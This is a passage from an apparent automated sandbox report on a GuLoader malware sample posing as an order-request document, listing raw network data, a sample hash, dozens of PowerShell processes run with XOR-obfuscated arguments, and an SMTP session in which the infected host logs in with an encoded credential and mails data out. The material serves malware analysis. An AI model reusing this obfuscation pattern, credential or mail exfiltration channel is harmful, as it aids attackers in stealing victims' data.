Oct 5, 2022 09:36:17.544852018 CEST	143	IN	Data Raw: 03 04 1b 15 89 5a 90 5b 10 97 c0 3c 8d ad 4c 61 19 55 fc f4 40 0e 21 ba 93 9e 8f c8 b9 f7 56 92 69 54 fc 40 c7 5f 82 d0 d1 d4 18 76 1e 5f 6b 50 83 fe 3c 4a 2b a6 55 ee 14 9c 1d a7 bf 31 77 a9 ce d4 4d c6 64 1c 1c 41 65 f4 64 82 ec 46 5b 09 8b f8 Data Ascii: Z[<LaU@!ViT@_v_kP<J+U1wMdAedF[Tu"nbm4!R\e$-ACe@8q-o?m#ObT=9rQQF7qcpEHFs+~I%\Z%Lk:kkUPD:
Oct 5, 2022 09:36:17.544922113 CEST	145	IN	Data Raw: 71 73 f2 bb d5 5c 1c ff 43 8a e6 22 ba 8c e2 a4 69 8b 21 49 7f d6 33 b4 78 96 6b 7c 9c 92 e6 3f 27 cf af ef 83 d6 56 e3 b1 b0 66 73 f7 23 d3 68 3b b1 d2 ab 9c ca a3 31 b8 cf c6 31 1a 23 3a 60 d7 48 ce 1a 3f de 68 3a ac 49 33 a6 5e 2b 57 6b 2c fe Data Ascii: qs\C"i!I3xk\|?'Vfs#h;11#:`H?h:I3^+Wk,e~[+]Pt w>Rb)t/kqKXw\|?!+T1I{b'(MzICTiR_rbx!J$m4r;~%rG"r?%A
Oct 5, 2022 09:36:17.544976950 CEST	146	IN	Data Raw: 57 72 e1 17 f7 33 db 83 16 f7 b1 f4 9c 68 8a 13 22 ee 28 f6 84 02 18 05 c6 3e 02 f2 ca a5 8b 73 84 e3 db 98 d4 bb 31 9f c3 a0 e6 00 f6 26 e7 e9 be a9 5e a3 fe 5e 03 a4 a7 78 41 e3 5e c8 dd e1 94 7d d2 86 0e a9 2d 27 1b d1 3c b6 87 74 42 33 d9 85 Data Ascii: Wr3h"(>s1&^^xA^}-'<tB3Xp>ph4Mkw`g7u{g3`.Td>~#S-w_of0%lDd,@;{hPeIiORg[:2a%\|od9SIRUoENW_cU
Oct 5, 2022 09:36:17.545041084 CEST	147	IN	Data Raw: f0 56 2e 69 54 fc ca a5 1d 95 fe 3d 4d 18 70 05 4e 6b b4 81 fe 3c 4a 97 a6 55 ee a9 87 d1 e0 97 f5 74 81 53 d2 65 5a 4c 80 16 69 ab dc 77 b4 c6 61 09 09 81 5a 4d 9a 6c 1b bc be b8 7f 7c d3 a7 9a bd fb 3c d1 ee e1 10 42 d4 f4 70 67 83 7a 35 6a c1 Data Ascii: V.iT=MpNk<JUtSeZLiwaZMl\|<Bpgz5jtBmCmP{H#c#ZZ1\kKZ7(8_W%[`IyBD+qcmEVD{b&~.I25={Z%Lm6+l'/YWVB?#UD//$7vIu&<^h6<
Oct 5, 2022 09:36:17.545118093 CEST	149	IN	Data Raw: 6c e7 1d 3a cd be 01 a8 8c 56 ef bb b2 60 41 ad 23 d2 62 54 04 d2 5d 95 a5 10 3f b8 c5 d9 3b 0d 28 3a 7e dc 5f 30 01 13 dd 71 29 a7 49 22 be 43 d5 56 49 23 fc 0a 57 7a 5b 21 de ca b7 fc 4b 7e 90 17 b9 8e c9 c9 81 da ec e5 30 e8 95 5f 09 38 d6 9b Data Ascii: l:V`A#bT]?;(:~_0q)I"CVI#Wz[!K~0_8c:r9buIfkD?!"}%EjXply1&M{_<TS$}GATrj=]{4l ?~>B"}?V}A+{%b>Z{H3}Zslo

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Oct 5, 2022 09:37:54.844677925 CEST	587	49842	208.91.199.224	192.168.11.20	220 us2.outbound.mailhostbox.com ESMTP Postfix
Oct 5, 2022 09:37:54.845031023 CEST	49842	587	192.168.11.20	208.91.199.224	EHLO 849224
Oct 5, 2022 09:37:55.007831097 CEST	587	49842	208.91.199.224	192.168.11.20	250-us2.outbound.mailhostbox.com 250-PIPELINING 250-SIZE 41648128 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING
Oct 5, 2022 09:37:55.009535074 CEST	49842	587	192.168.11.20	208.91.199.224	AUTH login c2xpbXNoYWR5QGp1YmFuYS5jYW0=
Oct 5, 2022 09:37:55.174710989 CEST	587	49842	208.91.199.224	192.168.11.20	334 UGFzc3dvcmQ6
Oct 5, 2022 09:37:55.342622995 CEST	587	49842	208.91.199.224	192.168.11.20	235 2.7.0 Authentication successful
Oct 5, 2022 09:37:55.343780994 CEST	49842	587	192.168.11.20	208.91.199.224	MAIL FROM:<slimshady@jubana.cam>
Oct 5, 2022 09:37:55.508804083 CEST	587	49842	208.91.199.224	192.168.11.20	250 2.1.0 Ok
Oct 5, 2022 09:37:55.509232044 CEST	49842	587	192.168.11.20	208.91.199.224	RCPT TO:<slimshadyrrr@jubana.cam>
Oct 5, 2022 09:37:55.722536087 CEST	587	49842	208.91.199.224	192.168.11.20	250 2.1.5 Ok
Oct 5, 2022 09:37:55.722939014 CEST	49842	587	192.168.11.20	208.91.199.224	DATA
Oct 5, 2022 09:37:55.886796951 CEST	587	49842	208.91.199.224	192.168.11.20	354 End data with <CR><LF>.<CR><LF>
Oct 5, 2022 09:37:55.889211893 CEST	49842	587	192.168.11.20	208.91.199.224	.
Oct 5, 2022 09:37:56.190964937 CEST	587	49842	208.91.199.224	192.168.11.20	250 2.0.0 Ok: queued as 9D6A6A8011B
Oct 5, 2022 09:39:31.808327913 CEST	49842	587	192.168.11.20	208.91.199.224	QUIT
Oct 5, 2022 09:39:31.972100019 CEST	587	49842	208.91.199.224	192.168.11.20	221 2.0.0 Bye

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exePID: 408, Parent PID: 4840

General

Target ID:	1
Start time:	09:34:58
Start date:	05/10/2022
Path:	C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
Imagebase:	0x400000
File size:	152504 bytes
MD5 hash:	297CEE2E9339AB19CB96A073CA8BA85F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 1220, Parent PID: 408

General

Target ID:	3
Start time:	09:35:00
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x6B6570CB -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5956, Parent PID: 1220

General

Target ID:	4
Start time:	09:35:00
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 2716, Parent PID: 408

General

Target ID:	5
Start time:	09:35:01
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x656C3197 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1956, Parent PID: 2716

General

Target ID:	6
Start time:	09:35:01
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 6380, Parent PID: 408

General

Target ID:	7
Start time:	09:35:02
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x3A3A41D7 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4228, Parent PID: 6380

General

Target ID:	8
Start time:	09:35:02
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 5412, Parent PID: 408

General

Target ID:	9
Start time:	09:35:03
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x656176C0 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3312, Parent PID: 5412

General

Target ID:	10
Start time:	09:35:03
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 1120, Parent PID: 408

General

Target ID:	11
Start time:	09:35:03
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x46696EC0 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6856, Parent PID: 1120

General

Target ID:	12
Start time:	09:35:04
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 1584, Parent PID: 408

General

Target ID:	13
Start time:	09:35:04
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x41286F85 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1708, Parent PID: 1584

General

Target ID:	14
Start time:	09:35:04
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 3312, Parent PID: 408

General

Target ID:	15
Start time:	09:35:05
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x72342289 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5412, Parent PID: 3312

General

Target ID:	16
Start time:	09:35:05
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 6856, Parent PID: 408

General

Target ID:	17
Start time:	09:35:06
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x20692295 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1120, Parent PID: 6856

General

Target ID:	18
Start time:	09:35:06
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 5524, Parent PID: 408

General

Target ID:	19
Start time:	09:35:06
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x78383295 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6932, Parent PID: 5524

General

Target ID:	20
Start time:	09:35:07
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 2524, Parent PID: 408

General

Target ID:	21
Start time:	09:35:07
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x30303295 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3000, Parent PID: 2524

General

Target ID:	22
Start time:	09:35:07
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 6588, Parent PID: 408

General

Target ID:	23
Start time:	09:35:08
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x302C22CC -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3368, Parent PID: 6588

General

Target ID:	24
Start time:	09:35:08
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 2920, Parent PID: 408

General

Target ID:	25
Start time:	09:35:09
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x20302E85 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 2608, Parent PID: 2920

General

Target ID:	26
Start time:	09:35:09
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 1220, Parent PID: 408

General

Target ID:	27
Start time:	09:35:09
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x70203289 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7172, Parent PID: 1220

General

Target ID:	28
Start time:	09:35:09
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 8080, Parent PID: 408

General

Target ID:	29
Start time:	09:35:10
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x20692291 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 2368, Parent PID: 8080

General

Target ID:	30
Start time:	09:35:10
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 1584, Parent PID: 408

General

Target ID:	31
Start time:	09:35:11
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x2C206B85 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6856, Parent PID: 1584

General

Target ID:	32
Start time:	09:35:11
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 5956, Parent PID: 408

General

Target ID:	33
Start time:	09:35:12
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x30783A95 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5960, Parent PID: 5956

General

Target ID:	34
Start time:	09:35:12
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 4492, Parent PID: 408

General

Target ID:	35
Start time:	09:35:12
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x2C206B85 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5432, Parent PID: 4492

General

Target ID:	36
Start time:	09:35:12
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 7228, Parent PID: 408

General

Target ID:	37
Start time:	09:35:13
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x30296B8B -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5824, Parent PID: 7228

General

Target ID:	38
Start time:	09:35:13
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 6136, Parent PID: 408

General

Target ID:	39
Start time:	09:35:14
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x723322FC -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3876, Parent PID: 6136

General

Target ID:	40
Start time:	09:35:14
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 6332, Parent PID: 408

General

Target ID:	41
Start time:	09:35:15
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x6B6570CB -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4348, Parent PID: 6332

General

Target ID:	42
Start time:	09:35:15
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 6496, Parent PID: 408

General

Target ID:	43
Start time:	09:35:16
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x656C3197 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7940, Parent PID: 6496

General

Target ID:	44
Start time:	09:35:16
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 5668, Parent PID: 408

General

Target ID:	45
Start time:	09:35:16
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x3A3A54CC -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7284, Parent PID: 5668

General

Target ID:	46
Start time:	09:35:17
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 7840, Parent PID: 408

General

Target ID:	48
Start time:	09:35:17
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x727477C4 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5256, Parent PID: 7840

General

Target ID:	49
Start time:	09:35:17
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 5796, Parent PID: 408

General

Target ID:	50
Start time:	09:35:18
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
